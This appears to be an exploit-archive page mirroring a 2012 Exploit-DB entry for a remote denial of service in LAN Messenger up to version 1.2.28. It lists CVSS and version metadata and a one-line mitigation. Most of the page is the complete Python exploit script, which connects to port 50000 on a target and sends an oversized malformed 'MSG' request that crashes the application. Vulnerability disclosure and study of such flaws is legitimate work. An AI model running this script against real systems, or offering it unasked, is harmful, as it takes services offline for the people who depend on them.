LAN Messenger - exploit.company

vendor:

LAN Messenger

by:

Julien Ahrens

7.5

CVSS

HIGH

Remote Denial of Service

CWE

Product Name: LAN Messenger

Affected Version From: 1.2.2000

Affected Version To: 1.2.28

Patch Exists: NO

Related CWE:

CPE: a:lanmsngr:lan_messenger:1.2.28

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3 Professional German, Windows 2008R2 SP1 German

2012

LAN Messenger <= v1.2.28 Remote Denial of Service Vulnerability

This exploit targets LAN Messenger version 1.2.28 and below, causing a remote denial of service. It sends a malformed request to the target, resulting in a crash. The exploit has been tested on Windows XP SP3 Professional German and Windows 2008R2 SP1 German.

Mitigation:

Update LAN Messenger to a version above 1.2.28 to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
 
# Exploit Title: LAN Messenger <= v1.2.28 Remote Denial of Service Vulnerability
# Version:       <= v1.2.28
# Date:          2012-04-28
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://lanmsngr.sourceforge.net/
# Tested on:     Windows XP SP3 Professional German, Windows 2008R2 SP1 German
# Notes:         Under WinXP the app needs 8190 Bytes to crash
# Howto:         -

from struct import pack
import socket,sys
import os

target="192.168.0.1"
port=50000

junk = "\x41" * 8190 

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

print "[*] Sending malformed request..."
s.send("\x4d\x53\x47" + junk)

print "[!] Exploit has been sent!\n"
s.close()